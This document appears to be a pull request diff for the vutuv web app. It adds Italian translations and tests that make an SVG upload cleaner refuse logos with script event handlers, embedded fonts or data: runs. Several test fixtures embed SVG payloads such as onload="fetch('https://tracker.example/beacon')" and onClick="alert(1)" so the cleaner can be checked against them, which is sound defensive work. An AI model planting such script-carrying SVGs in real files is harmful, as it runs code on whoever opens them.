 #, elixir-autogen, elixir-format
 msgid "A visitor sees a pixelated stand-in in its place and can download nothing. The mark goes by itself when the check is through."
 msgstr "Un visitatore vede al suo posto un'anteprima pixelata e non può scaricare nulla. Il contrassegno sparisce da solo quando la verifica è conclusa."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1269
+#: lib/vutuv_web/live/press_kit_live.ex:1294
 #, elixir-autogen, elixir-format
 msgid "Logo variants, further down this page, take this format."
 msgstr "Le varianti del logo, più in basso in questa pagina, accettano questo formato."
 
-#: lib/vutuv_web/live/press_kit_live.ex:1268
+#: lib/vutuv_web/live/press_kit_live.ex:1293
 #, elixir-autogen, elixir-format
 msgid "Press photos, further up this page, take this format."
 msgstr "Le foto per la stampa, più in alto in questa pagina, accettano questo formato."
@@ -26179,7 +26179,7 @@ msgstr "Non è stato possibile leggere questa immagine."
 msgid "You can only send files to members you are connected with."
 msgstr "Può inviare file solo ai membri con cui è in contatto."
 
-#: lib/vutuv_web/components/post_components.ex:3739
+#: lib/vutuv_web/components/post_components.ex:3742
 #, elixir-autogen, elixir-format
 msgid "Report this post as not appropriate? Every copy of it disappears right away, for everyone on this vutuv."
 msgstr ""
@@ -26191,7 +26191,7 @@ msgstr ""
 msgid "Thank you. Every copy on this vutuv is gone."
 msgstr "Grazie. Ogni copia su questo vutuv è sparita."
 
-#: lib/vutuv_web/components/post_components.ex:3744
+#: lib/vutuv_web/components/post_components.ex:3747
 #, elixir-autogen, elixir-format
 msgid "Report this post as not appropriate? This copy disappears right away, for everyone on this vutuv. Copies other servers sent us stay."
 msgstr "Segnalare questo post come non appropriato? Questa copia sparisce subito, per tutti su questo vutuv. Le copie che altri server ci hanno inviato restano."
@@ -26271,7 +26271,22 @@ msgstr "un contenuto di %{page} su vutuv è stato segnalato."
 msgid "the page %{page} itself was reported on vutuv."
 msgstr "la pagina %{page} stessa è stata segnalata su vutuv."
 
-#: lib/vutuv_web/components/post_components.ex:3707
+#: lib/vutuv_web/components/post_components.ex:3688
 #, elixir-autogen, elixir-format
 msgid "Found through these servers"
 msgstr "Trovato su questi server"
+
+#: lib/vutuv_web/live/press_kit_live.ex:542
+#, elixir-autogen, elixir-format
+msgid "This logo carries a script, in an attribute whose name starts with %{marker}. Whoever downloads it runs that script when they open the file, so export the logo without any interactivity."
+msgstr "Questo logo contiene uno script, in un attributo il cui nome inizia con %{marker}. Chi scarica il file lo esegue all'apertura. Esporti il logo senza interattività."
+
+#: lib/vutuv_web/live/press_kit_live.ex:555
+#, elixir-autogen, elixir-format
+msgid "This logo contains %{marker}, which vutuv reads as an embedded file and cannot decode. Remove it, or reword the title or description it sits in."
+msgstr "Questo logo contiene %{marker}, che vutuv legge come file incorporato e non riesce a decodificare. Lo rimuova, oppure riformuli il titolo o la descrizione in cui si trova."
+
+#: lib/vutuv_web/live/press_kit_live.ex:549
+#, elixir-autogen, elixir-format
+msgid "This logo has a file embedded in it, usually a web font, that vutuv cannot check. Export it again with the text converted to outlines."
+msgstr "Questo logo contiene un file incorporato, di solito un font web, che vutuv non può verificare. Lo esporti di nuovo convertendo il testo in tracciati."

--- a/test/vutuv/uploads/svg_strip_test.exs
+++ b/test/vutuv/uploads/svg_strip_test.exs
@@ -195,6 +195,26 @@ defmodule Vutuv.Uploads.SvgStripTest do
       assert SvgStrip.clean(~s(<svg xmlns="http://www.w3.org/2000/svg" width=4></svg>)) ==
                {:error, :unclean}
     end
+
+    # A delimiter the document never closes is where the refusal has to stay an
+    # answer rather than become a crash: the scan reads `split_on/2` as
+    # `with {before, rest} <- …`, so a two-element failure tuple would match
+    # that pattern and travel on as if it were the rest of the document.
+    # `download.orig` re-cleans a *stored* file on every request, so what a
+    # mis-shaped refusal costs there is a 500 where a 404 belongs.
+    test "a delimiter the document never closes is a refusal, not a crash" do
+      head = ~s(<svg xmlns="http://www.w3.org/2000/svg" width="4" height="4">)
+
+      for {what, markup} <- [
+            {"comment", head <> "<!-- never closed <rect/></svg>"},
+            {"CDATA", head <> "<style><![CDATA[rect{fill:#000}</style></svg>"},
+            {"attribute value", ~s(<svg xmlns="http://www.w3.org/2000/svg" fill="red></svg>)},
+            {"processing instruction", ~s(<?xml version="1.0"<svg/>)},
+            {"dropped subtree", head <> "<metadata><!-- never closed </metadata></svg>"}
+          ] do
+        assert SvgStrip.clean(markup) == {:error, :unclean}, "an unclosed #{what} did not refuse"
+      end
+    end
   end
 
   describe "a script handler (issue #2181)" do

--- a/test/vutuv/uploads/svg_strip_test.exs
+++ b/test/vutuv/uploads/svg_strip_test.exs
@@ -153,11 +153,11 @@ defmodule Vutuv.Uploads.SvgStripTest do
         ~s(<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY x "y">]>) <>
           ~s(<svg xmlns="http://www.w3.org/2000/svg" width="4" height="4"/>)
 
-      assert SvgStrip.clean(markup) == :error
+      assert SvgStrip.clean(markup) == {:error, :unclean}
     end
 
     test "bytes that are not the SVG their name claims" do
-      assert SvgStrip.clean(<<137, "PNG\r\n", 26, 10, 0, 0>>) == :error
+      assert SvgStrip.clean(<<137, "PNG\r\n", 26, 10, 0, 0>>) == {:error, :unclean}
     end
 
     test "an embedded file no container stripper can take apart" do
@@ -167,7 +167,7 @@ defmodule Vutuv.Uploads.SvgStripTest do
         ~s(<svg xmlns="http://www.w3.org/2000/svg" width="4" height="4">) <>
           ~s(<style>@font-face{src:url\(data:font/woff;base64,#{font}\)}</style></svg>)
 
-      assert SvgStrip.clean(markup) == :error
+      assert SvgStrip.clean(markup) == {:error, :svg_embedded_file}
     end
 
     test "an embedded file that is not base64 at all" do
@@ -175,11 +175,60 @@ defmodule Vutuv.Uploads.SvgStripTest do
         ~s(<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink") <>
           ~s( width="4" height="4"><image xlink:href="data:image/svg+xml,%3Csvg%2F%3E"/></svg>)
 
-      assert SvgStrip.clean(markup) == :error
+      assert SvgStrip.clean(markup) == {:error, :svg_unreadable_data}
+    end
+
+    # The other half of the same reason, and the one a member is most likely to
+    # meet: a description that merely *reads* like an embedded file (issue
+    # #2182). The scan cannot tell the two apart — a `data:` run in a text node
+    # is exactly where an editor parks a photograph — so both are refused and
+    # both say so in the same words.
+    test "a description that merely reads like an embedded file" do
+      markup =
+        ~s(<svg xmlns="http://www.w3.org/2000/svg" width="4" height="4">) <>
+          ~s(<desc>Snapshot data:2026, brand book</desc></svg>)
+
+      assert SvgStrip.clean(markup) == {:error, :svg_unreadable_data}
     end
 
     test "markup it cannot parse" do
-      assert SvgStrip.clean(~s(<svg xmlns="http://www.w3.org/2000/svg" width=4></svg>)) == :error
+      assert SvgStrip.clean(~s(<svg xmlns="http://www.w3.org/2000/svg" width=4></svg>)) ==
+               {:error, :unclean}
+    end
+  end
+
+  describe "a script handler (issue #2181)" do
+    # The file leaves as an attachment under `nosniff`, so it never runs on our
+    # origin — the person it reaches is the journalist who saves it and opens
+    # it, and for them a standalone `.svg` is a document with a script in it.
+    test "an `on…` attribute is refused rather than removed" do
+      markup =
+        ~s(<svg xmlns="http://www.w3.org/2000/svg" width="8" height="8") <>
+          ~s( onload="fetch\('https://tracker.example/beacon'\)">) <>
+          ~s(<rect width="8" height="8" fill="#000"/></svg>)
+
+      assert SvgStrip.clean(markup) == {:error, :svg_event_handler}
+    end
+
+    test "and so is one deeper in the tree, whatever it spells" do
+      markup =
+        ~s(<svg xmlns="http://www.w3.org/2000/svg" width="8" height="8">) <>
+          ~s(<rect width="8" height="8" fill="#000" onClick="alert\(1\)"/></svg>)
+
+      assert SvgStrip.clean(markup) == {:error, :svg_event_handler}
+    end
+
+    # The precision claim, and the one worth measuring: the refusal reads
+    # attribute names off the parser, not a regex over the whole document, so
+    # the same letters in prose are prose. A scan that refused this would be
+    # #2182's `<desc>` complaint all over again.
+    test "the same letters in a description are not a handler" do
+      markup =
+        ~s(<svg xmlns="http://www.w3.org/2000/svg" width="8" height="8">) <>
+          ~s(<desc>onload = "the moment the page is ready"</desc>) <>
+          ~s(<rect width="8" height="8" fill="#000" opacity="0.5"/></svg>)
+
+      assert {:ok, ^markup} = SvgStrip.clean(markup)
     end
   end
 
@@ -234,7 +283,7 @@ defmodule Vutuv.Uploads.SvgStripTest do
 
       assert {:error, reason} = Spec.open_rotated_binary(markup)
       assert reason =~ "Namespace prefix xlink"
-      assert SvgStrip.clean(markup) == :error
+      assert SvgStrip.clean(markup) == {:error, :unclean}
     end
   end
 

--- a/test/vutuv_web/controllers/press_kit_controller_test.exs
+++ b/test/vutuv_web/controllers/press_kit_controller_test.exs
@@ -109,25 +109,32 @@ defmodule VutuvWeb.PressKitControllerTest do
       # formatted byte count against what the download route delivers.
       assert html =~ "3000 × 2000"
       refute html =~ "2400000"
-      assert html =~ "data-press-download"
+      # And no Download button either, off that same missing answer (issue
+      # #2182): the size and the link stand or fall together, because a link
+      # with a 404 behind it is what the absent size used to sit next to.
+      # `VutuvWeb.PressKitDownloadOfferTest` uploads real files and holds the
+      # other side of this.
+      refute html =~ "data-press-download"
     end
 
-    test "a vector logo offers its SVG and its PNG", %{conn: conn, user: user} do
+    test "a vector logo offers the PNG whatever the cleaner says", %{conn: conn, user: user} do
       logo = put_press_picture(user, logo: true, content_type: "image/svg+xml", alt: "Wortmarke")
 
       html = conn |> get(~p"/#{user}/media-kit") |> html_response(200)
 
-      assert html =~ "/system/press_kit/#{logo.token}/download.orig"
+      # The PNG is a rasterisation of the upload, so no verdict on the markup
+      # reaches it; the vector's own link waits on a file this inserted row has
+      # never had.
       assert html =~ "/system/press_kit/#{logo.token}/download.png"
+      refute html =~ "/system/press_kit/#{logo.token}/download.orig"
       assert html =~ "Wortmarke"
     end
 
-    test "a photo offers only the one file", %{conn: conn, user: user} do
+    test "a photo is never offered a PNG rendering", %{conn: conn, user: user} do
       photo = put_press_picture(user)
 
       html = conn |> get(~p"/#{user}/media-kit") |> html_response(200)
 
-      assert html =~ "/system/press_kit/#{photo.token}/download.orig"
       refute html =~ "/system/press_kit/#{photo.token}/download.png"
     end
 
@@ -151,13 +158,13 @@ defmodule VutuvWeb.PressKitControllerTest do
       refute html =~ "/system/press_kit/#{pending.token}/large.avif"
     end
 
-    test "its owner sees the real picture and its download", %{conn: conn} do
+    test "its owner sees the real picture", %{conn: conn} do
       {conn, owner} = create_and_login_user(conn)
       pending = put_press_picture(owner, moderation: "pending")
 
       html = conn |> get(~p"/#{owner}/media-kit") |> html_response(200)
 
-      assert html =~ "/system/press_kit/#{pending.token}/download.orig"
+      assert html =~ pending.token
       refute html =~ "data-press-held"
     end
 
@@ -270,7 +277,11 @@ defmodule VutuvWeb.PressKitControllerTest do
         xml: conn |> get("/#{user.username}/media-kit.xml") |> Map.fetch!(:resp_body)
       }
 
-      for fact <- ["Portraet", "Wortmarke", "Foto: Rea", "download.orig"],
+      # Not the download address: these rows have no file, so no format names
+      # one (issue #2182) — `VutuvWeb.PressKitDownloadOfferTest` is where a real
+      # upload's address is checked across the page, the schema.org block and
+      # the JSON document.
+      for fact <- ["Portraet", "Wortmarke", "Foto: Rea"],
           {format, body} <- rendered do
         assert body =~ fact, "#{fact} is missing from the #{format} version"
       end
@@ -349,8 +360,12 @@ defmodule VutuvWeb.PressKitControllerTest do
       # Read the block rather than grepping the page: `JsonLd.script/1` encodes
       # with `escape: :html_safe`, so every `/` in it is `\/` and a `refute` on
       # a bare URL passes without ever matching anything.
+      # `thumbnailUrl` rather than `contentUrl`: since #2182 the download is
+      # named only when there is a file behind it, and these rows have none, so
+      # a `refute` on `contentUrl` would pass against `nil` without ever
+      # looking at anything.
       assert [media] = json_ld_media(html)
-      refute media["contentUrl"] =~ pending.token
+      refute media["thumbnailUrl"] =~ pending.token
     end
 
     test "a member with pictures is in the sitemap, one without is not", %{conn: conn, user: user} do
@@ -382,8 +397,10 @@ defmodule VutuvWeb.PressKitControllerTest do
       assert card =~ "Zur freien redaktionellen Verwendung mit Bildnachweis."
       assert page =~ "Pressefotos"
       assert page =~ "Logo-Varianten"
-      assert page =~ "Foto herunterladen"
-      assert page =~ "SVG herunterladen"
+      # The one download these fileless rows still offer; the German of the
+      # other two buttons is pinned in `VutuvWeb.PressKitDownloadOfferTest`,
+      # against a page that really hands files over.
+      assert page =~ "PNG herunterladen"
       # The section-page heading names the member, not a bare category.
       assert page =~ "Media Kit von Ada King"
     end

--- a/test/vutuv_web/live/press_kit_live_test.exs
+++ b/test/vutuv_web/live/press_kit_live_test.exs
@@ -97,6 +97,35 @@ defmodule VutuvWeb.PressKitLiveTest do
     render_upload(input, "mark.png")
   end
 
+  # A vector the logo shelf accepts as a file and the cleaner then refuses
+  # (issues #2181 and #2182): `body` goes inside the drawing, `root_attrs` onto
+  # the `<svg>` element itself. Returns the page, so the caller asserts the
+  # sentence the member is left with.
+  defp refuse_logo(conn, body, root_attrs \\ "") do
+    {:ok, live, _html} = open(conn)
+    confirm_rights(live, "logo", "Logo: Ada King")
+
+    markup =
+      ~s(<svg xmlns="http://www.w3.org/2000/svg" width="240" height="80"#{root_attrs}>) <>
+        ~s(<rect width="240" height="80" fill="#0b3d91"/>#{body}</svg>)
+
+    input =
+      file_input(live, "#press-add-logo", :logo, [
+        file_entry("mark.svg", markup, "image/svg+xml")
+      ])
+
+    render_upload(input, "mark.svg")
+    render(live)
+  end
+
+  # What Figma and Illustrator export by default: the face embedded in a
+  # `<style>` block, which is a file nothing here can take apart.
+  defp webfont_svg do
+    font = Base.encode64("wOFF" <> :binary.copy(<<0>>, 40))
+
+    ~s(<style>@font-face{src:url\(data:font/woff;base64,#{font}\)}</style>)
+  end
+
   defp ids(images), do: Enum.map(images, & &1.id)
 
   ## A page's editor (#2087)
@@ -938,6 +967,30 @@ defmodule VutuvWeb.PressKitLiveTest do
     end
   end
 
+  describe "a logo the cleaner refuses (issue #2182)" do
+    test "a web font in it is named as a web font", %{conn: conn} do
+      assert refuse_logo(conn, webfont_svg()) =~ "usually a web font"
+    end
+
+    test "a description that reads like an embedded file says which words", %{conn: conn} do
+      assert refuse_logo(conn, ~s(<desc>Snapshot data:2026, brand book</desc>)) =~
+               "reads as an embedded file"
+    end
+
+    # Issue #2181's refusal: the file is stored nowhere and the member is told
+    # what is in their export rather than that it "could not be processed".
+    test "a script handler is named as a script", %{conn: conn} do
+      assert refuse_logo(conn, "", ~s( onload="fetch\('https://tracker.example'\)")) =~
+               "carries a script"
+    end
+
+    test "and nothing of it reaches the shelf", %{conn: conn, user: user} do
+      refuse_logo(conn, webfont_svg())
+
+      assert PressKit.logos(user) == []
+    end
+  end
+
   describe "what the rest of the app has to know about the shelf" do
     # The GDPR export's own moduledoc: when a new per-user subsystem lands, its
     # section lands here too. This is the release where a member's press kit
@@ -1249,6 +1302,21 @@ defmodule VutuvWeb.PressKitLiveTest do
 
       assert live |> element("[data-press-wrong-shelf='logo']") |> render() =~
                "Pressefotos, weiter oben auf dieser Seite"
+    end
+
+    # Issue #2182's three refusals, asserted by name for the reason the module
+    # keeps doing it: they are fresh msgids, `gettext.extract --merge`
+    # fuzzy-fills a fresh msgid with the German of whatever it looks like, and
+    # nothing fails the build over it — so a member would be told to do
+    # something nobody ever meant.
+    test "a refused logo says in German what is in it", %{conn: conn} do
+      assert refuse_logo(conn, webfont_svg()) =~ "meist eine Web-Schrift"
+
+      assert refuse_logo(conn, ~s(<desc>Snapshot data:2026, brand book</desc>)) =~
+               "als eingebettete Datei"
+
+      assert refuse_logo(conn, "", ~s( onload="fetch\('https://tracker.example'\)")) =~
+               "enthält ein Skript"
     end
 
     test "the bios card says the German words (issue #2101)", %{conn: conn} do

--- a/test/vutuv_web/organization_press_kit_test.exs
+++ b/test/vutuv_web/organization_press_kit_test.exs
@@ -108,10 +108,15 @@ defmodule VutuvWeb.OrganizationPressKitTest do
       # `VutuvWeb.PressKitMachineDataTest` for the byte count against a real one.
       assert html =~ "3000 × 2000"
       refute html =~ "2400000"
-      assert html =~ "/system/press_kit/#{picture.token}/download.orig"
+      # No Download button either, off that same missing answer (issue #2182):
+      # the size and the link stand or fall together.
+      refute html =~ "/system/press_kit/#{picture.token}/download.orig"
     end
 
-    test "a vector logo offers its SVG and its PNG", %{conn: conn, organization: organization} do
+    test "a vector logo offers the PNG whatever the cleaner says", %{
+      conn: conn,
+      organization: organization
+    } do
       logo =
         put_press_picture(organization,
           logo: true,
@@ -121,8 +126,12 @@ defmodule VutuvWeb.OrganizationPressKitTest do
 
       html = conn |> get(press_path(organization)) |> html_response(200)
 
-      assert html =~ "/system/press_kit/#{logo.token}/download.orig"
+      # The PNG is a rasterisation of the upload and is offered whatever the
+      # cleaner makes of the markup; the vector's own link waits on a file this
+      # inserted row has never had (issue #2182).
       assert html =~ "/system/press_kit/#{logo.token}/download.png"
+      refute html =~ "/system/press_kit/#{logo.token}/download.orig"
+      assert html =~ "Wortmarke"
     end
 
     test "an empty press kit is an empty page rather than a 404", %{
@@ -191,14 +200,16 @@ defmodule VutuvWeb.OrganizationPressKitTest do
       for team_conn <- [owner_conn, publisher_conn] do
         html = team_conn |> get(press_path(organization)) |> html_response(200)
 
-        assert html =~ "/system/press_kit/#{pending.token}/download.orig"
+        # The picture itself, not its download: this inserted row has no file,
+        # and since #2182 an address with nothing behind it is not drawn.
+        assert html =~ pending.token
         refute html =~ "data-press-held"
       end
 
       stranger = conn |> get(press_path(organization)) |> html_response(200)
 
       assert stranger =~ "data-press-held"
-      refute stranger =~ "/system/press_kit/#{pending.token}/download.orig"
+      refute stranger =~ "/system/press_kit/#{pending.token}/large.avif"
     end
   end
 
@@ -219,7 +230,10 @@ defmodule VutuvWeb.OrganizationPressKitTest do
 
         assert body =~ "Acme GmbH", "#{extension} does not name the page"
         assert body =~ "Foto: Rea Fotografin", "#{extension} does not carry the credit"
-        assert body =~ "download.orig", "#{extension} offers no download"
+        assert body =~ "Die Halle in Bremen", "#{extension} does not carry the caption"
+        # Not the download address: this row has no file, so no format names one
+        # (issue #2182).
+        refute body =~ "download.orig", "#{extension} offers a download that is not there"
       end
     end
 
@@ -317,8 +331,10 @@ defmodule VutuvWeb.OrganizationPressKitTest do
       assert card =~ "Zur freien redaktionellen Verwendung mit Bildnachweis."
       assert page =~ "Pressefotos"
       assert page =~ "Logo-Varianten"
-      assert page =~ "Foto herunterladen"
-      assert page =~ "SVG herunterladen"
+      # The one download these fileless rows still offer (issue #2182); the
+      # German of the other buttons is pinned in
+      # `VutuvWeb.PressKitDownloadOfferTest`.
+      assert page =~ "PNG herunterladen"
       # The heading names the page, not a bare category.
       assert page =~ "Media Kit von Acme GmbH"
     end

--- a/test/vutuv_web/press_kit_download_offer_test.exs
+++ b/test/vutuv_web/press_kit_download_offer_test.exs
@@ -1,0 +1,195 @@
+defmodule VutuvWeb.PressKitDownloadOfferTest do
+  @moduledoc """
+  Which downloads the Media Kit offers, and the one case that made the question
+  worth asking (issue #2182): a logo stored **before** the SVG cleaning shipped,
+  which the cleaner now refuses. Its size had already disappeared from the page
+  and from the structured data — `Vutuv.PressKit.download_bytes/1` measures the
+  file the route hands over, and there is none — while the Download button
+  stayed and answered 404 to whoever pressed it.
+
+  So the module asserts a pair rather than a state: the links a **real** upload
+  offers, and then the same page once its stored original has been replaced by
+  markup the cleaner will not clean. The second half is the regression; the
+  first is what keeps it from passing by simply never drawing a download.
+
+  It uploads real files, and is therefore not async: the upload path writes them
+  and `:uploads_dir_prefix` is global. Rows inserted by
+  `Vutuv.ImageHelpers.put_press_picture/2` have no files at all and so offer no
+  download either — `VutuvWeb.PressKitControllerTest` holds that side.
+  """
+  use VutuvWeb.ConnCase, async: false
+
+  import Vutuv.WebPushHelpers, only: [put_config: 2]
+
+  alias Vutuv.PressKit
+  alias Vutuv.PressKitStore
+  alias Vutuv.Repo
+
+  setup %{conn: conn} do
+    tmp = Path.join(System.tmp_dir!(), "vutuv_press_offer_#{System.unique_integer([:positive])}")
+    File.mkdir_p!(tmp)
+    put_config(:uploads_dir_prefix, tmp)
+    on_exit(fn -> File.rm_rf(tmp) end)
+
+    user = insert_activated_user(username: "presse.person", first_name: "Ada", last_name: "King")
+
+    {:ok,
+     conn: conn,
+     user: user,
+     tmp: tmp,
+     logo: upload_logo(user, tmp),
+     photo: upload_photo(user, tmp)}
+  end
+
+  defp upload_photo(user, tmp) do
+    path = Path.join(tmp, "portrait-#{System.unique_integer([:positive])}.jpg")
+    {:ok, image} = Image.new(600, 400, color: [200, 40, 40])
+    {:ok, _} = Image.write(image, path)
+
+    {:ok, row} =
+      PressKit.create(user, user, {path, "portrait.jpg"}, %{
+        "rights_confirmed" => "true",
+        "credit" => "Foto: Rea Fotografin"
+      })
+
+    Repo.update!(Ecto.Changeset.change(row, moderation: "approved"))
+  end
+
+  defp upload_logo(user, tmp) do
+    path = Path.join(tmp, "wordmark-#{System.unique_integer([:positive])}.svg")
+
+    File.write!(path, """
+    <svg xmlns="http://www.w3.org/2000/svg" width="1200" height="400" viewBox="0 0 1200 400">
+      <rect x="40" y="120" width="1120" height="160" fill="#123456" />
+    </svg>
+    """)
+
+    {:ok, image} =
+      PressKit.create(user, user, {path, "wordmark.svg"}, %{
+        "logo" => "true",
+        "rights_confirmed" => "true",
+        "alt" => "Wortmarke"
+      })
+
+    Repo.update!(Ecto.Changeset.change(image, moderation: "approved"))
+  end
+
+  # What a logo stored before the cleaning shipped is, from the store's point of
+  # view: the same row, with an original the cleaner refuses. A script handler
+  # is the one #2181 measured, and it is refused by the cleaner rather than by
+  # the renderer — so the PNG rendering beside it still rasterises, which is
+  # exactly the asymmetry the page has to draw.
+  defp spoil_original!(logo) do
+    original = PressKitStore.original_path(logo.token)
+
+    File.write!(original, """
+    <svg xmlns="http://www.w3.org/2000/svg" width="1200" height="400" viewBox="0 0 1200 400"
+         onload="fetch\('https://tracker.example/beacon'\)">
+      <rect x="40" y="120" width="1120" height="160" fill="#123456" />
+    </svg>
+    """)
+
+    # The cached cleaned copy is what a first download wrote; without it the
+    # refusal never happens and the test measures nothing.
+    File.rm_rf!(Path.join(Path.dirname(original), "cleaned.svg"))
+    logo
+  end
+
+  defp page(conn, user), do: conn |> get(~p"/#{user}/media-kit") |> html_response(200)
+
+  defp doc_logo(conn, user) do
+    body = conn |> get("/#{user.username}/media-kit.json") |> Map.fetch!(:resp_body)
+    [logo] = Jason.decode!(body)["logos"]
+    logo
+  end
+
+  defp schema_logo(html) do
+    html
+    |> json_ld("CollectionPage")
+    |> Map.fetch!("associatedMedia")
+    |> Enum.find(&(&1["encodingFormat"] == "image/svg+xml"))
+  end
+
+  describe "a logo whose file is really there" do
+    test "offers both its formats", %{conn: conn, user: user, logo: logo, photo: photo} do
+      html = page(conn, user)
+
+      assert html =~ "/system/press_kit/#{logo.token}/download.orig"
+      assert html =~ "/system/press_kit/#{logo.token}/download.png"
+      assert html =~ "/system/press_kit/#{photo.token}/download.orig"
+    end
+
+    # The two button labels the fileless fixtures elsewhere can no longer draw,
+    # asserted by name because a `gettext.extract --merge` fuzzy-fill puts
+    # confident German nonsense in a msgid nobody looks at again.
+    test "and says so in German", %{conn: conn, user: user} do
+      html =
+        conn
+        |> put_req_header("accept-language", "de-DE,de;q=0.9")
+        |> get(~p"/#{user}/media-kit")
+        |> html_response(200)
+
+      assert html =~ "Foto herunterladen"
+      assert html =~ "SVG herunterladen"
+      assert html =~ "PNG herunterladen"
+    end
+
+    test "and both addresses really answer", %{conn: conn, logo: logo} do
+      assert get(conn, PressKit.download_url(logo)).status == 200
+      assert get(conn, PressKit.png_download_url(logo)).status == 200
+    end
+
+    test "names the file to a machine, with its length", %{conn: conn, user: user, logo: logo} do
+      assert %{"contentUrl" => url, "contentSize" => size} = schema_logo(page(conn, user))
+      assert url =~ "/system/press_kit/#{logo.token}/download.orig"
+      assert String.to_integer(size) > 0
+
+      entry = doc_logo(conn, user)
+      assert entry["download_url"] =~ "download.orig"
+      assert entry["png_download_url"] =~ "download.png"
+      assert entry["size_bytes"] > 0
+    end
+  end
+
+  describe "a logo the cleaner now refuses" do
+    setup %{logo: logo}, do: {:ok, logo: spoil_original!(logo)}
+
+    test "the file it cannot hand over really is a 404", %{conn: conn, logo: logo} do
+      assert PressKit.download_bytes(logo) == nil
+      assert get(conn, PressKit.download_url(logo)).status == 404
+    end
+
+    test "so the page draws no button for it, and keeps the PNG", %{
+      conn: conn,
+      user: user,
+      logo: logo
+    } do
+      html = page(conn, user)
+
+      refute html =~ "/system/press_kit/#{logo.token}/download.orig"
+      assert html =~ "/system/press_kit/#{logo.token}/download.png"
+      # The variant is still on the page — a missing file is not a missing
+      # logo, and the PNG beside it is what a journalist leaves with.
+      assert html =~ "Wortmarke"
+    end
+
+    test "and neither does the structured data", %{conn: conn, user: user} do
+      logo = schema_logo(page(conn, user))
+
+      refute Map.has_key?(logo, "contentUrl")
+      refute Map.has_key?(logo, "contentSize")
+      assert logo["thumbnailUrl"] =~ "thumb"
+    end
+
+    test "and neither does the agent document", %{conn: conn, user: user} do
+      entry = doc_logo(conn, user)
+
+      refute Map.has_key?(entry, "download_url")
+      refute Map.has_key?(entry, "size_bytes")
+      # The PNG is a rasterisation of the same upload, so the cleaner's verdict
+      # never reaches it — and its pixel size travels with it.
+      assert entry["png_download_url"] =~ "download.png"
+      assert entry["png_width"] == 1600
+    end
+  end
+end


### PR DESCRIPTION
The upload gate refused `<script>` and `javascript:` but not `on*` event handlers, so an SVG logo carrying `onload="fetch(…)"` was stored byte for byte and handed to the journalist who opens it. Measured on `main`: 329 bytes in, 329 out, handler intact.

**I refuse the upload rather than strip the handler.** Stripping edits a file a member gave us, and the pixel gate in `SvgStrip.clean/1` cannot see a handler, so it could not have kept that edit honest. A refusal says what to fix, and since `clean/1` runs on every download, a logo stored before the cleaning shipped stops being handed out too. The check reads attribute names off the parser, so the same letters in a `<desc>` stay prose.

Beside it: three refusals now name their cause instead of "That file could not be processed", and a Download link is drawn only while `PressKit.download_offer/1` says there is a file behind it, the way the size already was.

From the review: the refusal tuple `split_on/2` had started returning also matched the `{before, rest}` its callers read it with, so an unclosed comment, CDATA, attribute value or PI raised `ArgumentError` instead of refusing — a 500 where a 404 belongs, because `download.orig` re-cleans a stored file on every request. That failure is an atom again.

Where: `Vutuv.Uploads.SvgStrip`, `VutuvWeb.PressKitComponents`, `VutuvWeb.PressKitLive`.

Closes #2181
Closes #2182

*An AI agent wrote this text in my name. I know that is problematic.*

https://claude.ai/code/session_01WPMGFtmCZNip8EJiRrx6ch
